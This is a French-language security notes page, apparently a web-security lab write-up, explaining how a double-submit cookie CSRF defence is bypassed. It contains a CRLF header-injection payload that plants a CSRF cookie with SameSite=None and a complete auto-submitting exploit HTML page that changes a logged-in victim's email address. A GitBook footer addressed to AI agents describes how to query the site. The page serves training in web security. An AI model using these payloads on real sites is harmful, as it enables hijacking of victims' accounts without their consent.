> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/csrf/csrf-with-duplicated-token-in-a-double-submit-cookie.md).

# CSRF avec jeton dupliqué dans un cookie double soumission

### CSRF où le jeton est dupliqué dans le cookie

#### Description

La fonctionnalité de changement d’adresse e-mail de ce laboratoire est vulnérable à une attaque CSRF. Le site essaie d’utiliser la technique fragile du **"double soumission"**: le même jeton CSRF est présent à la fois dans un champ de formulaire et dans un cookie. Cette protection est insuffisante si un attaquant peut forger une requête intersite qui envoie un `CSRF` champ contenant la même valeur.

#### Objectif

Héberger une page HTML sur votre **serveur** qui, lorsque le visiteur l’affiche, soumettra automatiquement une requête POST pour changer son adresse e-mail (résoudre le laboratoire).

#### Accès (identifiants)

Vous pouvez vous connecter avec : `wiener: peter`

#### Observations importantes issues des tests

* La valeur du jeton CSRF dans le formulaire et la valeur du cookie sont identiques.

<figure><img src="/files/2b20a219e3b28b467f6bf3430f9cb83f82998c9c" alt=""><figcaption></figcaption></figure>

#### Exemple d’injection CRLF (dans la `paramètre de recherche` barre d’adresse ou le paramètre)

<figure><img src="/files/b04746c945d2a888fca75c842f6972b99da7c2d9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/96484714249107f1cbb5eed56e7a030240fcfc4c" alt="" width="421"><figcaption></figcaption></figure>

```
hello%0d%0aSet-Cookie:%20csrfKey=qzAd1Kd7ItFul6Ix3H1S3LSXicK8KCfO
```

<figure><img src="/files/12efca15acfd09db72c3ff7ed0cd5dc0fe8248ee" alt=""><figcaption></figcaption></figure>

* Pour forcer l’envoi du cookie dans un contexte intersite, il est utile de définir `SameSite=None` sur le cookie.

```
hello Set-Cookie: csrfKey=qzAd1Kd7ItFul6Ix3H1S3LSXicK8KCfO; SameSite=none

hello%0d%0aSet-Cookie:%20csrfKey%3dqzAd1Kd7ItFul6Ix3H1S3LSXicK8KCfO%3b%20SameSite%3dnone
```

#### HTML d’exploitation à déposer sur le serveur d’exploitation

Voici un exemple de page qui place la valeur du jeton CSRF dans le `CSRF` champ, définit l’e-mail cible, puis soumet automatiquement le formulaire en tirant parti de la requête d’image (qui déclenche la tentative d’écriture du cookie via la recherche) :

```html
<form class="login-form" name="change-email-form" action="https://0a0c00eb04620591804903aa00c900fd.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked@jord4n.pro">
      <input required="" type="hidden" name="csrf" value="qzAd1Kd7ItFul6Ix3H1S3LSXicK8KCfO">
</form>

<img  src="https://0a0c00eb04620591804903aa00c900fd.web-security-academy.net/?search=hello%0d%0aSet-Cookie:%20csrf%3dqzAd1Kd7ItFul6Ix3H1S3LSXicK8KCfO%3b%20SameSite%3dnone" onerror="document.forms[0].submit();">
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/csrf/csrf-with-duplicated-token-in-a-double-submit-cookie.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
